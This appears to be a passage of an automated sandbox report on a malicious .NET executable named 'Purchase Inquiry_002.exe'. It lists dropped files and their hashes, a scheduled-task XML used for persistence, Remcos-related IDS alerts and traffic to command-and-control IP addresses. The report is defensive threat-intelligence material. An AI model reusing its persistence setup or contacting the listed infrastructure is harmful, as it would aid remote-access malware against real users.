                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\xASiLfzXONGIW.exe.log

                              Download File
                              Process:C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1216
                              Entropy (8bit):5.34331486778365
                              Encrypted:false
                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                              Malicious:false
                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\json[1].json

                              Download File
                              Process:C:\Users\user\Desktop\Purchase Inquiry_002.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):962
                              Entropy (8bit):5.015105568788186
                              Encrypted:false
                              SSDEEP:12:tkluQ+nd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qluQydRNuKyGX85jvXhNlT3/7AcV9Wro
                              MD5:8937B63DC0B37E949F38E7874886D999
                              SHA1:62FD17BF5A029DDD3A5CFB4F5FC9FE83A346FFFC
                              SHA-256:AB2F31E4512913B1E7F7ACAB4B72D6E741C960D0A482F09EA6F9D96FED842A66
                              SHA-512:077176C51DC10F155EE08326270C1FE3E6CF36C7ABA75611BDB3CCDA2526D6F0360DBC2FBF4A9963051F0F01658017389FD898980ACF7BB3B29B287F188EE7B9
                              Malicious:false
                              Preview:{. "geoplugin_request":"8.46.123.75",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:modified
                              Size (bytes):2232
                              Entropy (8bit):5.379460230152629
                              Encrypted:false
                              SSDEEP:48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZPUyxs:fLHyIFKL3IZ2KRH9OugYs
                              MD5:DEB5A9A8979B751F817ECBC2841F644A
                              SHA1:24CA1EF1CAA9B1E458C2B0A2504A606A1D3F1919
                              SHA-256:94CEDFEA0D52A603FC2D814442996EA37098FC221B2927828ECB986617FC5EEF
                              SHA-512:FE33FD74F0836ED81018ABF53D4451502DC4B3ED6A2CCD14F86B98FD46B63651E4425AC1EC34D91BA5875D82C979CFC7DF585763BAF0B132FC310D9530784018
                              Malicious:false
                              Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_33v4kdys.yge.ps1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ryrwtse.3j2.psm1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_43yswqfg.a4e.ps1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u1iadovm.elz.ps1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ul5pcprh.0rg.psm1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_un2hzs0q.jig.psm1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xb5laily.wjp.ps1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xgkyn1bq.i3f.psm1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\tmp3EA3.tmp

                              Download File
                              Process:C:\Users\user\Desktop\Purchase Inquiry_002.exe
                              File Type:XML 1.0 document, ASCII text
                              Category:dropped
                              Size (bytes):1572
                              Entropy (8bit):5.1204644578053955
                              Encrypted:false
                              SSDEEP:48:cge7XQBBYrFdOFzOzN33ODOiDdKrsuTSv:He7XQBBYrFdOFzOz6dKrsu0
                              MD5:137FC4F37CB038A17A4ED8E307485BA6
                              SHA1:C12679A1644AE594A72FD0FA3892C3DC4A0EB396
                              SHA-256:D959E53F5DBDC228656D801E3D2013EB9BD0140608EB6A07CDC50CB119C59C5C
                              SHA-512:6F75E96A1F503E44F08DDEBB953D1A198D7FCBB36D43FC0EC8275C6BE8B64EA5621A0F42E28B754C217318CB55B3C6ED0CB84DDE5B37C756F13977A3ACC97BCE
                              Malicious:true
                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f

                              C:\Users\user\AppData\Local\Temp\tmp4FBA.tmp

                              Download File
                              Process:C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe
                              File Type:XML 1.0 document, ASCII text
                              Category:dropped
                              Size (bytes):1572
                              Entropy (8bit):5.1204644578053955
                              Encrypted:false
                              SSDEEP:48:cge7XQBBYrFdOFzOzN33ODOiDdKrsuTSv:He7XQBBYrFdOFzOz6dKrsu0
                              MD5:137FC4F37CB038A17A4ED8E307485BA6
                              SHA1:C12679A1644AE594A72FD0FA3892C3DC4A0EB396
                              SHA-256:D959E53F5DBDC228656D801E3D2013EB9BD0140608EB6A07CDC50CB119C59C5C
                              SHA-512:6F75E96A1F503E44F08DDEBB953D1A198D7FCBB36D43FC0EC8275C6BE8B64EA5621A0F42E28B754C217318CB55B3C6ED0CB84DDE5B37C756F13977A3ACC97BCE
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f

                              C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe

                              Download File
                              Process:C:\Users\user\Desktop\Purchase Inquiry_002.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):914432
                              Entropy (8bit):7.9612048561210855
                              Encrypted:false
                              SSDEEP:24576:WNo7gN9rqhq/5UqutCi1BDUTskujqA5pd6p3MFHdIvYV:QL2hq/6q1i1h4v3A5pdSOWvY
                              MD5:C016B06A4942455DF9CE8A58B72BCC90
                              SHA1:DBA52AFE33451C444FD5CF3C6ACA9D2CED768D2C
                              SHA-256:E115D3BD2903D9D663A7A69EDD08B0BA5F2528C831D17530BBF621648B44894C
                              SHA-512:961475A98CFDC14A29725B43C1807A3EDA08A2257F50D216375FAF262880CE39CF7847D00263D00FD1CE032AD14FBB003B3AB1E78BBD25B3A644F3D6746168FE
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 74%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...U7<g..............0.................. ... ....@.. .......................`............@.................................7...O.... ..L....................@......8...T............................................ ............... ..H............text........ ...................... ..`.rsrc...L.... ......................@..@.reloc.......@......................@..B................k.......H........}...O......i.......0............................................0..$..........s......s.....s ......o!...&..+..*.0..)........s\....s.......o[...s......o".......+...*....0..+........s\....r...p.(#......o[...s......o$....+..*..0..0........s\....rC..p.r...p(%......o[...s......o$....+..*.0...........s\.......O...%.r...p.%...%.r...p.%...%.r...p.%....%.r!..p.%....%.r;..p.%.....%..rU..p.%.....%..ry..p.%....%..r...p.(&......o[...s.......o$...&r...p('...&......o(...('...&...*.

                              C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe:Zone.Identifier

                              Download File
                              Process:C:\Users\user\Desktop\Purchase Inquiry_002.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):26
                              Entropy (8bit):3.95006375643621
                              Encrypted:false
                              SSDEEP:3:ggPYV:rPYV
                              MD5:187F488E27DB4AF347237FE461A079AD
                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                              Malicious:true
                              Preview:[ZoneTransfer]....ZoneId=0

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Entropy (8bit):7.9612048561210855
                              TrID:
                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                              • Win32 Executable (generic) a (10002005/4) 49.75%
                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                              • Windows Screen Saver (13104/52) 0.07%
                              • Generic Win/DOS Executable (2004/3) 0.01%
                              File name:Purchase Inquiry_002.exe
                              File size:914'432 bytes
                              MD5:c016b06a4942455df9ce8a58b72bcc90
                              SHA1:dba52afe33451c444fd5cf3c6aca9d2ced768d2c
                              SHA256:e115d3bd2903d9d663a7a69edd08b0ba5f2528c831d17530bbf621648b44894c
                              SHA512:961475a98cfdc14a29725b43c1807a3eda08a2257f50d216375faf262880ce39cf7847d00263d00fd1ce032ad14fbb003b3ab1e78bbd25b3a644f3d6746168fe
                              SSDEEP:24576:WNo7gN9rqhq/5UqutCi1BDUTskujqA5pd6p3MFHdIvYV:QL2hq/6q1i1h4v3A5pdSOWvY
                              TLSH:2415234223B88B9BD5BE4BF492B2709153F1726B6A31F32C4EE294DD6055F90A79130F
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...U7<g..............0.................. ... ....@.. .......................`............@................................

                              File Icon

                              Icon Hash:90cececece8e8eb0

                              Static PE Info

                              General

                              Entrypoint:0x4e078a
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Time Stamp:0x673C3755 [Tue Nov 19 06:59:33 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                              Entrypoint Preview

                              Instruction
                              jmp dword ptr [00402000h]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0xe07370x4f.text
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xe20000x64c.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xe40000xc.reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG0xde6380x54.text
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x20000xde7900xde800139320dbfdddfe7038379597a52bf952False0.967504608497191data7.966548982352114IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rsrc0xe20000x64c0x8009ad2be29f34795eac2e6526b507cdbe1False0.34228515625data3.5221250481585593IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc0xe40000xc0x200bb53d9c3eb206652af52fbd23d9d7155False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                              Resources

                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              RT_VERSION0xe20900x3bcdata0.41527196652719667
                              RT_MANIFEST0xe245c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                              Imports

                              DLLImport
                              mscoree.dll_CorExeMain

                              Network Behavior

                              Suricata IDS Alerts

                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                              2024-11-21T12:22:03.765320+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.1049749154.216.19.1412531TCP
                              2024-11-21T12:22:07.045321+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.1049757178.237.33.5080TCP

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Nov 21, 2024 12:22:02.200669050 CET497492531192.168.2.10154.216.19.141
                              Nov 21, 2024 12:22:02.320832014 CET253149749154.216.19.141192.168.2.10
                              Nov 21, 2024 12:22:02.321149111 CET497492531192.168.2.10154.216.19.141
                              Nov 21, 2024 12:22:02.326456070 CET497492531192.168.2.10154.216.19.141
                              Nov 21, 2024 12:22:02.446472883 CET253149749154.216.19.141192.168.2.10
                              Nov 21, 2024 12:22:03.716294050 CET253149749154.216.19.141192.168.2.10
                              Nov 21, 2024 12:22:03.765320063 CET497492531192.168.2.10154.216.19.141
                              Nov 21, 2024 12:22:03.967907906 CET253149749154.216.19.141192.168.2.10
                              Nov 21, 2024 12:22:04.008040905 CET497492531192.168.2.10154.216.19.141
                              Nov 21, 2024 12:22:04.010598898 CET497492531192.168.2.10154.216.19.141
                              Nov 21, 2024 12:22:04.130064964 CET253149749154.216.19.141192.168.2.10
                              Nov 21, 2024 12:22:04.130129099 CET497492531192.168.2.10154.216.19.141
                              Nov 21, 2024 12:22:04.250155926 CET253149749154.216.19.141192.168.2.10
                              Nov 21, 2024 12:22:04.693664074 CET253149749154.216.19.141192.168.2.10
                              Nov 21, 2024 12:22:04.694988012 CET497492531192.168.2.10154.216.19.141
                              Nov 21, 2024 12:22:04.814821959 CET253149749154.216.19.141192.168.2.10
                              Nov 21, 2024 12:22:04.903795004 CET253149749154.216.19.141192.168.2.10
                              Nov 21, 2024 12:22:04.952790976 CET497492531192.168.2.10154.216.19.141
                              Nov 21, 2024 12:22:05.679328918 CET4975780192.168.2.10178.237.33.50
                              Nov 21, 2024 12:22:05.798876047 CET8049757178.237.33.50192.168.2.10
                              Nov 21, 2024 12:22:05.799037933 CET4975780192.168.2.10178.237.33.50
